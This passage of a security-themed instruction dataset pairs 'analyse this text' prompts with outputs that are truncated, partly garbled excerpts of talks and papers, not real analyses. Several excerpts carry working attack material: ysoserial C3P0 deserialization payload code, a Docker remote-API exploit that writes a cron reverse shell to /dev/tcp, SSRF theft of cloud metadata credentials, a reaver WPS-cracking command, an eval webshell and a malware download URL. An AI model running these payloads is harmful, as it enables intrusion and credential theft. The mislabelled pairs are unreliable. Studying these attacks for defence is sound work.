demonstrate the potential severity of impact, the redirect was also used to list the available roles for the server at http://169.254.169.254/latest/meta-data/iam/security-credentials/ before extracting the keys by navigating to one of the available rolls. The screenshot below shows the result of navigating to one of the available rolls.", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nS-C3P0反序列化 起因 一个关于 fastjson 不出网的利用方法利用 C3P0 结合 ROME 二次反序列化注入内存马 漏洞原理 yso源码 首先来看 yso 的构造链以及如何生成 payload 构造链 com.mchange.v2.c3p0.impl.PoolBackedDataSourceBase->readObject - > com.mchange.v2.naming.ReferenceIndirector$ReferenceSerialized->getObject - > com.sun.jndi.rmi.registry.RegistryContext->lookup package ysoserial.payloads; import java.io.PrintWriter; import java.sql.SQLException; import java.sql.SQLFeatureNotSupportedException; import java.util.logging.Logger; import javax.naming.NamingException; import javax.naming.Reference; import javax.naming.Referenceable; import javax.sql.ConnectionPoolDataSource; import javax.sql.PooledConnection; import com.mchange.v2.c3p0.PoolBackedDataSource; import com.mchange.v2.c3p0.impl.PoolBackedDataSourceBase; import ysoserial.payloads.annotation.Authors; import ysoserial.payloads.annotation.Dependencies; import ysoserial.payloads.annotation.PayloadTest; import ysoserial.payloads.util.PayloadRunner; import ysoserial.payloads.util.Reflections; /** * com.sun.jndi.rmi.registry.RegistryContext->lookup * com.mchange.v2.naming.ReferenceIndirector$ReferenceSerialized->getObject * com.mchange.v2.c3p0.impl.PoolBackedDataSourceBase->readObject * * Arguments: * - base_url:classname * Yields: * - Instantiation of remotely loaded class * @author mbechler * */ @PayloadTest ( harness=\"ysoserial.test.payloads.RemoteClassLoadingTest\" ) @Dependencies( { \"com.mchange:c3p0:0.9.5.2\" ,\"com.mchange:mchange-commons- java:0.2.11\"} ) @Authors({ Authors.MBECHLER }) public class C3P0 implements ObjectPayload<Object> { 序列化的过程首先创建一个 PoolBackedDataSource 对象然后通过反射将 connectionPoolDataSource 属性修改为 PoolSource 的实例化对象所以此处查看一下序列化 的过程 序列化过程 public Object getObject ( String command ) throws Exception { int sep = command.lastIndexOf(':'); if ( sep < 0 ) { throw new IllegalArgumentException(\"Command format is: <base_url>: <classname>\"); } String url = command.substring(0, sep); String className = command.substring(sep + 1); PoolBackedDataSource b = Reflections.createWitho", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nEL3 Tour: Get The Ultimate Privilege of Android Phone Guanxing Wen 2019 Bio  Senior Security Researcher at Pangu  Exploitation and Reversing Engineering  Recently  Firmware, Bootloader, Kernel  Previously  Adobe Flash Agenda  ARMv8 Privilege mode  Post-startup architecture of Huawei P20  Hunt EL3 Vulnerabilities  Execute shellcode in EL3  Face ID Bypass ARMv8 Privilege Mode Linux Kernel Hypervisor Trusted Firmware (No limits: Physical Memory, TTBR0_ELx, VBAR_ELx, ) Trusted Kernel Application Framework Libraries Services Trusted App EL0 EL1 EL2 EL3 Normal World Secure World Huawei P20 Huawei P20  ARMv8 (Hisilicon Kirin 970) Huawei P20  ARMv8 (Hisilicon Kirin 970)  Android phone with great cameras Huawei P20  ARMv8 (Hisilicon Kirin 970)  Android phone with great cameras  Customized EL3 and S-EL0 & 1 Boot Chain fastboot.img Boot Chain FASTBOOT Boot Chain FASTBOOT trustfirmware.img teeos.img kernel.img Boot Chain Trusted Firmware teeos.img kernel.img EL3 Boot Chain Trusted Firmware teeos.img kernel.img EL3 Boot Chain Trusted Firmware kernel.img EL3 Trusted Core Kernel S-EL1 globaltask task_xxx S-EL0 Boot Chain Trusted Firmware Linux Kernel EL3 Trusted Core Kernel S-EL1 globaltask task_xxx S-EL0 EL1 /sbin/teecd APK EL0 Interact with Secure World Trusted Firmware Linux Kernel EL3 Trusted Core Kernel S-EL1 globaltask task_xxx S-EL0 EL1 /sbin/teecd APK EL0 Normal World Secure World svc Interact with Secure World Trusted Firmware Linux Kernel EL3 Trusted Core Kernel S-EL1 globaltask task_xxx S-EL0 EL1 /sbin/teecd APK EL0 Normal World Secure World smc Interact with Secure World Trusted Firmware Linux Kernel EL3 Trusted Core Kernel S-EL1 globaltask task_xxx S-EL0 EL1 /sbin/teecd APK EL0 Normal World Secure World Interact with Secure World Trusted Firmware Linux Kernel EL3 Trusted Core Kernel S-EL1 globaltask task_xxx S-EL0 EL1 /sbin/teecd APK EL0 Normal World Secure World IPC Interact with Secure World Trusted Firmware EL3 ARM Trusted Firmware  https://github.com/ARM-software/a", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nTranslation-Based Steganography Christian Grothoff Krista Grothoff Ludmila Alkhutova Ryan Stutsman Mikhail Atallah CERIAS, Purdue University {christian,krista}@grothoff.org, {lalkhuto,rstutsma}@purdue.edu,mja@cs.purdue.edu Abstract. This paper investigates the possibilities of steganographically embedding information in the noise created by automatic translation of natural language documents. Because the inherent redundancy of nat- ural language creates plenty of room for variation in translation, machine translation is ideal for steganographic applications. Also, because there are frequent errors in legitimate automatic text translations, additional errors inserted by an information hiding mechanism are plausibly unde- tectable and would appear to be part of the normal noise associated with translation. Significantly, it should be extremely difficult for an adver- sary to determine if inaccuracies in the translation are caused by the use of steganography or by deficiencies of the translation software. 1 Introduction This paper presents a new protocol for covert message transfer in natural lan- guage text, for which we have a proof-of-concept implementation. The key idea is to hide information in the noise that occurs invariably in natural language trans- lation. When translating a non-trivial text between a pair of natural languages, there are typically many possible translations. Selecting one of these transla- tions can be used to encode information. In order for an adversary to detect the hidden message transfer, the adversary would have to show that the generated translation containing the hidden message could not be plausibly generated by ordinary translation. Because natural language translation is particularly noisy, this is inherently difficult. For example, the existence of synonyms frequently allows for multiple correct translations of the same text. The possibility of er- roneous translations increases the number of plausible variations and thus the opportunitie", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nMac OS X Server Open Directory Administration For Version 10.3 or Later 034-2352_Cvr 9/12/03 10:29 AM Page 1  Apple Computer, Inc.  2003 Apple Computer, Inc. All rights reserved. The owner or authorized user of a valid copy of Mac OS X Server software may reproduce this publication for the purpose of learning to use such software. No part of this publication may be reproduced or transmitted for commercial purposes, such as selling copies of this publication or for providing paid for support services. Every effort has been made to ensure that the information in this manual is accurate. Apple Computer, Inc., is not responsible for printing or clerical errors. Use of the keyboard Apple logo (Option-Shift-K) for commercial purposes without the prior written consent of Apple may constitute trademark infringement and unfair competition in violation of federal and state laws. Apple, the Apple logo, AirPort, AppleScript, AppleShare, AppleTalk, ColorSync, FireWire, Keychain, Mac, Mac OS, Macintosh, Power Mac, Power Macintosh, QuickTime, Sherlock, and WebObjects are trademarks of Apple Computer, Inc., registered in the U.S. and other countries. Extensions Manager, and Finder are trademarks of Apple Computer, Inc. Adobe and PostScript are trademarks of Adobe Systems Incorporated. Java and all Java-based trademarks and logos are trademarks or registered trademarks of Sun Microsystems, Inc. in the U.S. and other countries. Netscape Navigator is a trademark of Netscape Communications Corporation. RealAudio is a trademark of Progressive Networks, Inc. UNIX is a registered trademark in the United States and other countries, licensed exclusively through X/Open Company, Ltd. 034-2352/09-20-03 LL2352.Book Page 2 Friday, August 22, 2003 3:12 PM 3 3 Contents Preface 9 About This Guide 10 Using This Guide 11 Getting Additional Information Chapter 1 13 Directory Service Concepts 15 Directory Services and Directory Domains 16 A Historical Perspective 17 Data Consolidation 18 Data Distribut", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nHacking Embedded Devices (Doing Bad Things to Good Hardware) About your hosts  Phorkus has been breaking things since he was 5 years old.  SomeDmes with a hammer, someDmes a soldering iron.  EvilRob has been causing mayhem and devastaDng electronics since before he met beer.  Beer good. Fire bad. Before We Get Started  Wed like to thank some of the people whos work helped us make this possible  Joe Grand (You should all know him from TV)  Emerson Tan (The wonders of methylene chloride)  Flylogics silicon device aOacks ( hOp://www.flylogic.net/blog/)  Everyone whos ever screwed with an Arduino, AVR, ARM, MIPS, etc.  Finally to our families who gave us support as we liOered our houses with archaic electronics Why Were Here.  Well present a series of steps to help you evaluate a device for possible security holes.  Were trying to get a series of repeatable tasks that will allow you to begin the hardware and soUware evaluaDon  Well be standing up a site open to the community to be used to share informaDon on devices that people are working on cracking GeVng Down To Business  Youll need a few key pieces of physical equipment and soUware tools  Most of these items are not expensive and can be acquired for $500- $1000  A few of the big items (well cover these in detail)  Your Brain  A Voltmeter  Surface Mount Soldering/Hot Air Rework StaDon  Soldering Stuffs  Magnifying Glass  Microscope  Bus Pirate  Spare Parts  Debugging Interfaces  IDA Pro Your Brain  Remember SAFETY SAFETY SAFETY  Electricity can kill and maim and kill  Always be aware of your surroundings when soldering  Wear safety glasses  Dont die A Voltmeter  Absolutely needed to do circuit probing  Used to test various parts for electrical resistance  Needed to test the circuit voltage so you dont destroy your Bus Pirate  Check diode conducDvity  USB Volt Meters are great for recording directly to your computer  Volt Meters can go from very cheap all the way into the high hundreds (Fluke)  Well be using a $60 USB m", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nUnder the iHood DEFCON 16 Cameron Hotchkies 1 1chotchkies@tippingpoint.com DEFCON 16 Hotchkies ( chotchkies@tippingpoint.com ) Under the iHood DEFCON 16 1 / 50 About Me Work at TippingPoints Digital Vaccine Labs Responsible for vuln-discovery, patch analysis, product security Keep tabs on us at http://dvlabs.tippingpoint.com Author and contributor to: PaiMei Reverse Engineering Framework Absinthe SQL Injection tool Side projects: XSO - OS X Reversers: http://0x90.org/mailman/listinfo/xso Hotchkies ( chotchkies@tippingpoint.com ) Under the iHood DEFCON 16 2 / 50 Talk Outline File Formats Tools Common Disassembly Patterns Carbon Objective-C Case Study (Mac vs. Windows) Hotchkies ( chotchkies@tippingpoint.com ) Under the iHood DEFCON 16 3 / 50 Applications Applications in OS X are stored in a directory structure referred to as bundles or packages Finder will treat any directory ending in .app as a single entity self contained package with the binary and all necessary resources Hotchkies ( chotchkies@tippingpoint.com ) Under the iHood DEFCON 16 4 / 50 Application directory structure Hotchkies ( chotchkies@tippingpoint.com ) Under the iHood DEFCON 16 5 / 50 Info.plist XML or binary based list of application properties contains data such as major & minor version numbers, icon names, etc Well documented by Apple use plutil to convert between xml and binary formats The plutil command obeys no ones rules but its own. Hotchkies ( chotchkies@tippingpoint.com ) Under the iHood DEFCON 16 6 / 50 PkgInfo APPL indicates an apple application bundle No relevant information in the file 4-byte package type followed by the 4-byte signature Hotchkies ( chotchkies@tippingpoint.com ) Under the iHood DEFCON 16 7 / 50 Mach-O the standard binary format on OS X identified by the magic number 0xFEEDFACE 0xFEEDFACF on 64-bit Fat/Universal binaries include code for multiple architectures Fat binaries are identified by 0xCAFEBABE Hotchkies ( chotchkies@tippingpoint.com ) Under the iHood DEFCON 16 8 /", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nIs This Your Pipe? Hijacking the Build Pipeline $ whoami @rgbkrk OSS, Builds and Testing Protecting pipelines  Need Want benefits of continuous delivery!  Open source pathways to real, running infrastructure!  Community services with > 200,000 users Build Pipeline Components  Source Control  Continuous Integration  Upstream Sources Real Sites Need Secrets What secrets?  Cloud Credentials  OAuth Secrets  Integrate with etc. Managing Secrets Managing Secrets Not Credentials Get Leaked Rich Mogull I did not completely scrub my code before posting to GitHub. I did not have billing alerts enabled ... This was a real mistake ... I paid the price for complacency. ಠ_ಠ What can be done with Cloud Credentials?  Build new infrastructure  Delete your infrastructure  Append SSH keys to your primary set  Change root passwords  Redistribute your DNS and Load Balancers ಠ_ಠ Secret Finding Demo Cant we just let people know when they fuck up? gitsec/nanny  Search repositories for security oops  Email the original committer & owner of the project  Let them know how to revoke keys, panic Responses  Wow, thank you. How did you find these?  This is only a testing project  I dont even own this repository config/initializers/ secret_token.rb ಠ_ಠ What if you need secrets for testing? Travis CI Continuous Integration Build Platform Travis CI  Open Source, free for public repos  git push -> web hook -> tasks  Less control than Jenkins  Encrypted Secrets! language: python python: - 2.7 before_install: - pip install invoke==0.4.0 pytest==2.3.5 install: - pip install . script: invoke test Travis & Encrypted Secrets Can we leak decrypted secrets?  Travis CI Keys used for encryption and decryption are tied to the repository. If you fork a project and add it to travis, it will have a different pair of keys than the original. Masquerade Process 1. Find repository with credentials 2. Do legitimate work on a feature or bug 3. Include your security oops ... 4. Profit Speaker Transition! Whats the Build Pip", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n瑞星公司 FastDesktop 后门分析报告 报告贡献者XywCloud白同桌花茶 北京瑞星网安技术股份有限公司 北京瑞星网安技术股份有限公司 1 概述 瑞星威胁情报平台于 2022 年 3 月通过部署在 VirusTotal 上的瑞星扫描器搭载的机器学习引擎捕获 到了数个检出率较低的.NET 恶意程序 图其中一个文件的 VirusTotal 初次扫描结果 经分析溯源我们将这批恶意程序与相关的组件定性为后门并将其命名为\"FastDesktop\" 在分析过程中我们还发现该后门有两个大版本为便于区分将其分别命名为 v1 和 v2 版两个版 本的使用到的攻击技术及基础设施基本相同只是攻击流程有所区别本报告的样本分析章节将以 v2 版的样本分析为主之后会对 v1 版和 v2 版作简单的对比分析 整套样本使用了多种免杀技术相关技术也会在之后的章节进行介绍 攻击流程及样本分析 攻击流程 北京瑞星网安技术股份有限公司 2 图v1 版攻击流程 图v2 版攻击流程 样本分析 初始样本 样本基本信息 文件名 备用注册卡密.exe MD5 BBBC3919B71F50FBF6939088B7B7FD9E 文件大小 10.50 KB 文件类型 EXE 病毒名 Backdoor.FastDesktop!1.DD2A 表备用注册卡密.exe 样本基本信息 代码分析 该样本为整个攻击链条上的初始样本执行主要恶意行为的代码位于函数 entry此函数负责下载并 执 行 下 阶 段 的 恶 意 样 本  其 中 特 别 需 要 注 意 的 是 下 载 链 接 格 式 为 \"http[:]//asbit[.]cn/setup.core?t=%x\"其中参数 t 的值为调用系统 API 函数获取的本地计算机 启动时间攻击行动中的下载链接会随着时间不同而产生动态变化以此改变文件的 Hash 值在后 续攻击流程的其他阶段中都会使用此方法相关内容将会在之后的章节进行介绍 北京瑞星网安技术股份有限公司 3 图初始样本 entry 函数代码 根据下载链接的地址下载的恶意样本被命名为 setup.core.dll setup.core.dll 样本基本信息 文件名 setup.core.dll MD5 DA0A5953C6EE6AE87022BA39FC4D8C74 文件大小 36.50 KB 文件类型 DLL 病毒名 Backdoor.FastDesktop!1.DCA0 表setup.core.dll 样本基本信息 该样本主要功能除了下载下阶段模块样本之外还需要执行其他操作比如创建相关服务以实现持 久化并通过启动服务的方式执行下载的恶意样本 代码分析 首先获取存放下载文件的本地路径其中下载文件存放的目录名是本地电脑名的 CRC32 校验值 北京瑞星网安技术股份有限公司 4 图获取下载文件存放路径 其次判断传入参数中是否包含字符串\"uninstall\"包含此字符串则进行后门卸载操作删除相关服 务及目录 图删除相关服务及目录 最后如果参数中不包含\"uninstall\"字符串则执行样本的主要恶意功能下载文件并释放本地创 建并启动服务设置注册表项等功能 图主要功能代码 下载地址的格式为\"http[:]//asbit[.]cn/zipack/full?t=%x\"参数 t 的值是 GetTickCount 函数获 取的本地计算机启动时间通过读取数据流的方式将从服务器读取的数据存放于内存中然后将 内存中的数据进行解压写入本地目录中 北京瑞星网安技术股份有限公司 5 图下载数据代码 图读 取的数据流 释放于本地目录的下载文件 图被下载的文件 在被下载的文件中fdsvc.dll 和 libexpat.dll 是在后续代码中需要用到的程序根据文件的版本 信息可知两个文件均为迅雷公司的库文件其中 fdsvc.dll 为白名单文件版本信息显示文件的 真实名称为XLServicePlatform.dll而 libexpat.dll 则是攻击者伪造的恶意程序 北京瑞星网安技术股份有限公司 6 图fdsvc.dll 版本信息 服务创建并设置自启动该服务的启动路径为本地的 svchost.exe 程序相关代码如下图 图创建服务并设置自启动 服务创建成功后通过创建注册表项来设置服务对应的动态链接库 图创建注册表项 其结果如下图 北京瑞星网安技术股份有限公司 7 图创建的服务 图服务启动的注册表项 svchost.exe 启动服务时会动态加载服务注册表项中指向的文件虽然该文件是迅雷公司的正常文 件但攻击者通过伪造其导入表中的 libexpat.dll实现了 DLL 劫持将恶意样本挂载到 svchost.exe 程序进行执行 程序运行最后会有一个安装成功弹框我们推测此处是否出现弹框可在生成被控端时进行控制将 在", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nAbusing Web Hooks For Command And Control Dimitry Snezhkov @Op_nomad X-Force Red IBM Corporation What we are going to talk about Subject: Safe(er) bidirectional delivery of content and communication across network boundaries with the use of WebHook technology. From: - Hostile networks - Monitored networks - Censored networks - Restricted networks To: - External Hosts under your control. (C&C servers) Purpose: - External Content Retrieval - Internal Content Exfiltration - Shell Execution on External and Internal Hosts Audience Offense  Red Teamers  Pen Testers Defense  DF/IR folks  Sysadmins  Developers  Privacy Advocates  Anyone interested in covert communication Dimitry Snezhkov X-Force Red , IBM Corporation Opinions expressed are solely my own and do not express the views or opinions of my employer or its products. What I do: - Offensive Testing - Code Hacking - Tool Hacking - Other security work Watson> Are you sure?.. About Meet Defense at their map of the world.  Seek alternative means of effective outbound communication through content proxies.  Maximize adaptive retooling capability for exfiltration.  Minimize discoverability of outbound communication in environments  Use opportunities in targeted environment to overcome restrictions. Context: Strategic Goals  Achieve asynchronous or realtime-asynchronous communication between hostile network and external server under your control.  Attempt to achieve reverse connectivity to hostile networks from external server under your control  Avoid existing detection mechanisms, elevating OpSec capability.  Attempt to avoid censorship in communicating to safe external server under your control. Context: Tactical Goals Technical Mechanisms  Discover HTTP WebHooks concept.  Use WebHooks to Achieve asynchronous unidirectional or bi-directional connectivity with external world.  Develop a tool to shuttle communication over WebHooks. Set The Stage: Players  Offense (RED)  Defense(BLUE)  Content Proxy  Command and Control Ser", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Docker未授权访问漏洞 ## 漏洞描述 恶意攻击者可以在未经授权的情况下访问 Docker 服务器或容器这可能导致敏感数据泄露或允许攻击者执行未经授权的操作如添加修改或删除容器 ## 环境搭建 安装docker ``` yum install -y docker ``` 修改`/usr/lib/systemd/system/docker.service`服务启动API接口 ``` ExecStart=/usr/local/bin/dockerd -H tcp://0.0.0.0:2375 -H unix://var/run/docker.sock ``` ![image-20220726104747298](../../.gitbook/assets/image-20220726104747298.png) 重启docker服务 ``` systemctl daemon-reload systemctl restart docker ``` ![image-20220726104829456](../../.gitbook/assets/image-20220726104829456.png) ## 漏洞复现 输入`ip:2375/version`就会列出基本信息和docker version命令效果一样 ![image-20220726104904921](../../.gitbook/assets/image-20220726104904921.png) **利用docker容器写定时任务反弹shell** 我们可以利用未授权访问的docker remote api 开启一个容器并挂载至根目录由此我们可以获得任意读写的权限然后我们再将反弹shell命令写入定时任务crontab中即可使宿主机反弹shell ``` [root@localhost ~]# docker -H tcp://192.168.32.183:2375 run -it --user root --privileged -v /var/spool/cron/:/var/spool/cron/ alpine sh ``` 写入定时计划 ``` / # echo '* * * * * bash -i >& /dev/tcp/192.168.32.130/8088 0>&1' >> /var/spool/cron/root ``` ![image-20220726110359885](../../.gitbook/assets/image-20220726110359885.png) ## 安全加固 在不必需的情况下不要启用docker的remote api服务如果必须使用的话可以采用如下的加固方式 ``` 设置ACL仅允许信任的来源IP连接 设置TLS认证官方的文档为Protect the Docker daemon socket ``` 客户端与服务器端通讯的证书生成后可以通过以下命令启动docker daemon ``` docker -d --tlsverify --tlscacert=ca.pem --tlscert=server-cert.pem --tlskey=server-key.pem -H=tcp://10.10.10.10:2375 -H unix:///var/run/docker.sock ``` 客户端连接时需要设置以下环境变量 ``` export DOCKER_TLS_VERIFY=1 export DOCKER_CERT_PATH=~/.docker export DOCKER_HOST=tcp://10.10.10.10:2375 export DOCKER_API_VERSION=1.12 ```", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n玩转攻击检测 ID: tang3 用机器学习 绿盟科技 申军利 WHOAMI  IDtang3  绿盟科技安全研究员  WEBJava Web相关 PHP代码审计渗透攻防技术 研究  机器学习围观人员  健身爱好&研究者  棋臭瘾大围棋渣 目的思路分享 思路心得实践 常见机器学习方向  预测  分类  聚类 机器学习是 将现实问题转换为数学问题求解的过程 思考步骤  确认待解决问题是哪一类的问题  先正则后机器学习量质 没足够数量级的样本说个P 思考步骤  确认待解决问题是哪一类的问题分类  先正则后机器学习量质  特征量如何数字化数据预处理 数据的预处理 将数据内容转化为可以计算的模样 思考步骤  确认待解决问题是哪一类的问题分类  先正则后机器学习量质  特征量如何数字化数据预处理  选择最适合的算法  初期效果不错后再对算法进行进一步完善 机器学习不是万灵药它也有适合不适合的场景 实战环节 攻击检测引擎的实现  正常与攻击的二分类问题逻辑回归  攻击语句按照类型可以很容易得到大量样本  特征量是什么怎么数字化 问题思考 -1 and union select password from admin + 垃圾邮件分类器 朴素贝叶斯算法 (Naive Bayes, NB 算法)  正常与攻击的二分类问题逻辑回归  攻击语句按照类型可以很容易得到大量样本  特征量是什么怎么数字化 词与词的 关系 统计 问题思考  正常与攻击的二分类问题逻辑回归  攻击语句按照类型可以很容易得到大量样本  特征量是什么怎么数字化  算法朴素贝叶斯 问题思考  D为整个文本h+/h-分别代表攻击和非攻击W1 代表D中的第一个单词  P(h+|D) = P(h+)*P(D|h+)/P(D)  P(h-|D) = P(h-)*P(D|h-)/P(D)  P(h+|D)<>P(h-|D) 公式推演  使用朴素贝叶斯来简化计算 P(D|h+)=P(W1|h+)*P(W2|h+)*P(W3|h+) P(D|h-)=P(W1|h-)*P(W2|h-)*P(W3|h-) 公式实际应用  -1 union select 1,123,2 +  p(-1 union select 1,123,2 --+|h+) = p(-1|h+)  p(union|h+)  p(select|h+)  p(1|h+)   使用统计  大数定理  1000个攻击相关的单词union出现了10次那 P(union)=0.01 数据预处理  每种攻击一套 分词 单个切词性能很好但*10 一种攻击一个切词工作量 数据预处理通用分词  攻击语句均有代码特征抽象代码特性进行分词 可行  保证性能消耗不会因为攻击类型的增多而线性增 长值得 实现之后与正则检测 有什么不一样 不需编写任何代码规则便可完成建模 更新规则只需添加新语料到规则库 比正则引擎快上十多倍的检测效率 对算法进行交叉验证误报率6%漏报率0.66% 吸星数据来自K折线方法的评估 其他数据来自长亭PPT 0 20 40 60 80 吸星 SQLChop 厂商A 厂商B 厂商C libinjection 漏报率 误报率 广 告 我们做的这个攻击检测引擎叫做吸星 吸星 Star Track http://startra.nsfocus.com 发现漏误报可以联系 iamtang3@gmail.com 一些问题 概率是失控的也是公平的 通用切词如果发生修改就是 牵一发而动全身 每种攻击语言都有自己个 性的一面 WTF @eval//kjkjkjk ($_GET// [//kjkjkj 'c'//kjkioewuorwuo ]//kjlsjlkjljlkj ); @eval($_GET[c]); 一些猜想  单词的统计+其他分类机器学习逻辑回归  这种思路在日志审计甚至代码审计中能否使用 道阻且长 路漫漫其修远兮吾将上下而求索", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nCopyright 2019 NCC Group An NCC Group Publication Common Security Issues in Financially- Oriented Web Applications A guideline for penetration testers Prepared by: Soroush Dalili Version 2.0 NCC Group | Page 2  Copyright 2019 NCC Group Contents 1 Introduction ...................................................................................................................................... 3 2 Common Vulnerability Classes in Financially-Oriented Web Applications ...................................... 4 2.1 Time-of-Check-Time-of-Use (TOCTOU) and Race Condition Issues .................................... 4 2.1.1 Transferring Money or Points, or Buying Items Simultaneously................................ 4 2.1.2 Changing the Order upon Payment Completion ....................................................... 5 2.1.3 Changing the Order after Payment Completion ........................................................ 6 2.2 Parameter Manipulation ......................................................................................................... 6 2.2.1 Price Manipulation ..................................................................................................... 6 2.2.2 Currency Manipulation ............................................................................................... 6 2.2.3 Quantity Manipulation ................................................................................................ 7 2.2.4 Shipping Address and Post Method Manipulation ..................................................... 7 2.2.5 Additional Costs Manipulation ................................................................................... 7 2.2.6 Response Manipulation ............................................................................................. 7 2.2.7 Repeating an Input Parameter Multiple Times .......................................................... 8 2.2.8 Omitting an Input Parameter or its Value ........................................", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n新一代的恐怖袭击 基于树莓派的 渗透测试 锦龙信安(威客众测平台) 高级安全工程师 MXi4oyu 什么是树莓派 Raspberry Pi(中文名为树莓派,简写为RPi或者RasPi/RPi)是只有信 用卡 大小的微型计算机 树莓派之父埃本阿普顿Eben Epton 初心能够在帮助小孩学习的同时也能让他感受到在学习编程过程中的 愉悦感 树莓派的特点 (1)可编程可拓展可编程控制GPIO口可接各种传感器模块等 (2)可学习可娱乐集学习和娱乐于一身 (3)携带方便一张标准的信用卡大小 (4)成本低25美元 主要版本 树莓派B 树莓派B+ 树莓派接线图 小试牛刀-准备工作 (1)树莓派B+ (2)HDMI连接线1根 (3)SD卡(至少4G) (4)网线一根 (5)外接键盘 (6) Mini usb 数据线(输出电压5V给树莓派供电) 小试牛刀-系统烧录 (1)下载系统镜像 http://www.raspberrypi.org/downloads (2)使用Win32Disk Imager 进行镜像恢复 http://sourceforge.net/projects/win32diskimager/ (3)写入系统镜像 小试牛刀-基本设置 小试牛刀-基本配置 小试牛刀-登录系统 渗透测试系统-Pwn Pi http://www.pwnpi.com/ 树莓派安装Kali准备工作 (1)树莓派B+ (必备) (2)Micro SD卡 至少4G,必备) (3)Mini usb 数据线 (输出电压5V,必备) (4)HDMI连接线 (5)9寸车载Mini显示器 (6)无线键盘+鼠标套装 (7)3G/4G上网卡 (8)无线网卡支持监听模式) (9)读卡器 树莓派安装kali系统烧录 树莓派安装Kali开机启动 https://www.offensive-security.com/kali-linux-vmware-arm- image-download/ 摆渡攻击 狭义上的网络渗透的必然途径只能是互联网或者电话当我们的目标处在 一个规格严密的内网中我们有什么好的办法达到我们想要的目的 在现实生活中被河流隔断的两岸往往利用渡船进行摆渡实现相互交通而 在网络渗透中我们可以采取一种称之为摆渡攻击的手段而今天的树 莓派就是我们摆渡的船 攻击流程图 1.设备准备与信息收集 2.以社工等手段把树莓派送入内网 3.攻击路由器无线AP个人手机平板PC和服务器 4.以内部机器作为跳板漫游内网 供电 内网穿透 SSH Tunnel-SSH A主机外网www.91duofanli.comsshd端口22 B主机内网sshd端口22 SSH Tunnel证书登录 SSH Tunnel-AutoSSH SSH Tunnel-AutoSSH 接入互联网 利用3G/4G信号接入互联网 隐秘安装树莓派机器内部 隐秘安装树莓派伪装成礼物 信息收集 隐秘安装树莓派放到不宜察觉的地方 搜索附近无线热点 云检索 将ESSID:BSSID做为key 若此key不存在云端服务器中则将其添加到云服务器中value为password 列表默认为空 若此key存在云端服务器中则将查询结果返回到树莓派 根据检索密码自动连接无线热点 尝试破解wps airmon-ng start wlan0 wash -i mon0 C nohup sudo reaver -i mon0 -b 00:00:00:00:00:00 -a -S N -v -d2 -t 5 -c 11 - o fbi & wpa/wpa2 无线密码破解 树莓派超级计算机与计算机集群 搭建钓鱼wifi (1)桥接方式设置热点 (2)路由方式设置热点 中间人攻击 找到跳板机 Python编程控制树莓派GPIO 通过GPIO控制继电器", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nANTHONY ROSE JACOB KRASNOV VINCENT ROSE 1 @bcsecurity1 2 Legal StuffSo we dont go to jail Training is for informational and research purposes only. We believe that ethical hacking, information security and cyber security should be familiar subjects to anyone using digital information and computers. We believe that it is impossible to defend yourself from hackers without knowing how hacking is done. The information provided by us is only for those who are interested to learn about Ethical Hacking, Security, Penetration Testing and malware analysis. Introduction ANTHONY ROSE C01И  Co-founder, BC Security  Lead Researcher, Merculite Security  MS in Electrical Engineering  Lockpicking Hobbyist  Bluetooth & Wireless Security Enthusiast 3 whoami JACOB KRASNOV HUBBLE  Co-founder, BC Security  BS in Astronautical Engineering, MBA  Red Team Lead  Currently focused on embedded system security VINCENT ROSE HALCYON  Security Researcher, BC Security  BS in Computer Science  Software Engineer Introduction  How to mask your malware to avoid AMSI and Sandboxes 4 Why are we here? Introduction  Antimalware Scan Interface (AMSI)  Malware Triggering  Empire  Obfuscation Techniques  Invoke-Obfuscation  AMSI Bypasses  Sandbox Evasion  Put it all together 5 Overview Introduction  Introduce Microsofts Antimalware Scan Interface (AMSI) and explain its importance  Learn to analyze malware scripts before and after execution  Understand how obfuscate code to avoid AMSI and Windows Defender  Detect and avoid sandbox environments 6 Goals Introduction We will teach you to  operate Empire  obfuscate Powershell  avoid AMSI and Sandboxes We are not going to teach you  how to be a leet hacker 7 Expectations Introduction -h What is Malware? 8  Obfuscation is the main means by which Malware achieves survival  Defeat signature-based Antivirus  Makes analysis more difficult 9 Overview of the Evolution of Malware Obfuscation What is Malware Im Obfuscated You cant find me The first virus to obfuscate itsel", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nWhat are we talking about here? Anti-hacking law Communications law Intellectual property Criminal procedure Computer Fraud and Abuse Act (18 U.S.C. 1030) This is the federal anti-hacking law. Most states have something similar, too. CFAA basic prohibitions  Accessing a government computer without authorization for espionage purposes  Accessing a computer without authorization or in excess of authorization and obtaining info from: * a financial institution or credit reporting agency * a government computer * a \"protected computer\"  Trespassing upon a government system  Accessing a computer without authorization or in excess of authorization to defraud CFAA basic prohibitions  Sending a program, information, code or command to a computer and intentionally causing damage  Intentionally accessing a protected computer w/ out authorization and - recklessly causing 